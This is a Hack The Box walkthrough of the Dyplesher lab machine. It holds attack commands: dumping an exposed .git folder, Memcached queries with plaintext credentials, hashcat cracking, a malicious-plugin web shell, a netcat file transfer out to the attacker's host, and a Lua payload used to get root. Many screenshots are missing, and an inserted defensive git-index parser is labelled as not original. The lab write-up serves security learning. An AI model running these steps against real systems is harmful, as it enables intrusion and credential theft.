HTB Walkthrough Dyplesher


Dyplesher was released on the 23rd of May 2020.


This machine was rated Insane. In order to gain a foothold we had to dump the .git folder.


After a lot of enumeration and a few logins we finally arrived at the login page where we could upload a malicious plugin to get a web shell with code execution. This way I could write my SSH key to this user and was able to log in on the box. After looking around we saw that we have a group called wireshark, which means we can intercept packets and read the output from it. After studying those files we got some new credentials and were able to get the user.txt.


Felamos's home folder contains a hint that there is a tool which reviews the code automatically. After some research I found out this could be done with AMQP. To get root we took advantage of the program AMQP.



nmap -p- -A


Going to shows: shows:

Nothing interesting to find on here

The page showed earlier a host name, test.dyplesher.htb; adding test.dyplesher.htb to /etc/hosts

http://test.dyplesher.htb shows:

Couldn’t find anything on this page so I moved on. shows:

Also nothing to find right now

nmap result showed there should be a .git directory on port 80: shows:

But since there is a vhost we should check this one as well:

Looks like something is there but no access; time to poke around a bit.

Found something about git saying there should be a way to dump git files, and found the following tool:

mkdir gitdump

bash http://test.dyplesher.htb/.git/ /root/s3cwalk/dyplesher/gitdump/

We could extract some files

When we look into the index file we see the following:

Looks like this file has been removed. After some research, there is a chance we could restore these files with git restore:

git restore index.php
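Why the restore works, shown as an added example (not code from the original post): the .git/index file records the path and blob id of every tracked file even after it is deleted from the working tree, so a served .git directory still exposes it. The parser below can be run against your own deployment's index to list such files; it handles index versions 2 and 3 only, and the sample index, its blob ids and the README.md path are constructed.

```python
import hashlib
import struct

def parse_git_index(data):
    """Return mode, blob id and path for every entry of a v2/v3 git index."""
    sig, version, count = struct.unpack(">4sII", data[:12])
    if sig != b"DIRC":
        raise ValueError("not a git index file")
    if version not in (2, 3):
        raise ValueError("unsupported index version %d" % version)
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("index checksum mismatch (truncated file?)")
    entries, pos = [], 12
    for _ in range(count):
        mode, = struct.unpack(">I", data[pos + 24:pos + 28])
        blob = data[pos + 40:pos + 60].hex()
        flags, = struct.unpack(">H", data[pos + 60:pos + 62])
        name_at = pos + 62 + (2 if flags & 0x4000 else 0)  # v3 extended flags
        end = data.index(b"\x00", name_at)
        path = data[name_at:end].decode("utf-8", "replace")
        entries.append({"mode": oct(mode), "blob": blob, "path": path})
        pos += (end - pos + 8) & ~7  # entries are NUL-padded to 8 bytes
    return entries

def tracked_but_deleted(index_bytes, present_files):
    """Paths still recorded in the index although absent from the web root."""
    present = set(present_files)
    return [e["path"] for e in parse_git_index(index_bytes)
            if e["path"] not in present]

def build_sample_index(paths):
    """Constructed sample input: minimal v2 index with placeholder blob ids."""
    body = struct.pack(">4sII", b"DIRC", 2, len(paths))
    for p in sorted(paths):
        name = p.encode()
        # ctime, mtime, dev, ino zeroed; mode 100644; uid, gid, size zeroed
        entry = struct.pack(">10I", 0, 0, 0, 0, 0, 0, 0o100644, 0, 0, 0)
        entry += hashlib.sha1(name).digest()          # placeholder blob id
        entry += struct.pack(">H", len(name)) + name  # flags = name length
        entry += b"\x00" * (8 - len(entry) % 8)
        body += entry
    return body + hashlib.sha1(body).digest()

if __name__ == "__main__":
    sample = build_sample_index(["index.php", "README.md"])
    # index.php was deleted from the served directory, README.md was not
    for path in tracked_but_deleted(sample, ["README.md"]):
        print("still recoverable from .git:", path)
```

Any path this reports on a production web root means the .git directory should not be deployed there, or the server should deny requests to it.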

We found some credentials for Memcached, this port was also open on the nmap so time to go poke around there.


Getting values out of memcached:

memccat email --servers= --username=felamos --password=zxcvbnm


memccat username --servers= --username=felamos --password=zxcvbnm


memccat password --servers= --username=felamos --password=zxcvbnm


We found some valuable information; let's now try to decrypt these bcrypt hashes

hashcat64.exe -m 3200 hashes.txt rockyou.txt


We can now login to

When logged in there does not seem to be much there, but under releases there is a file called

This file contains a folder, repositories, with bundle file types. Since this is a repo, let’s try to git clone them:

git clone 4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle

git clone 4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle

git clone 6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle

git clone d4/73/d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle

In this folder is a DB file which contains a hash:



Also bcrypt; when we decrypt this one the password is alexis1

The next step is to find out where to log in with it and with what username. From the web enumeration earlier there is still a page we weren’t able to log in to, so let’s try that one:

and we are logged in:

Time to develop our own malicious plugin

adding new java package:

adding new class:

adding plugin.yml:

also create pom.xml

plugin.yml contains:

main contains:

pom file contains:

Time to build jar file:

upload plugin

load plugin

check if plugin is loaded

visit: http://test.dyplesher.htb/secwalk.php?cmd=id

upload our ssh rsa key to MinatoTW:

login with ssh:

id shows that we can run wireshark; with wireshark we can intercept the network traffic

tshark -i any -w secwalk.pcap

sending the file with netcat to my machine so I can have a visual look with wireshark:

send: nc -w 3 11211 < secwalk.pcap

receive: nc -l -p 11211 > secwalk.pcap

found credentials in AMQP packet:

and we got our first flag:

Felamos's home folder contains a hint for root privesc:

Earlier in the wireshark capture there were also creds available for the AMQP service. This service does exactly what they mention here, so let's try to exploit that.

First we need to create/edit a Python script so we can connect with the service:

After this is done we create a lua file which writes our RSA ssh key to the root folder:

our lua payload file looks like:

python -m SimpleHTTPServer 5672


we can see the command was successful:

and we got root on the Box:

Job done

Made by: S3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.
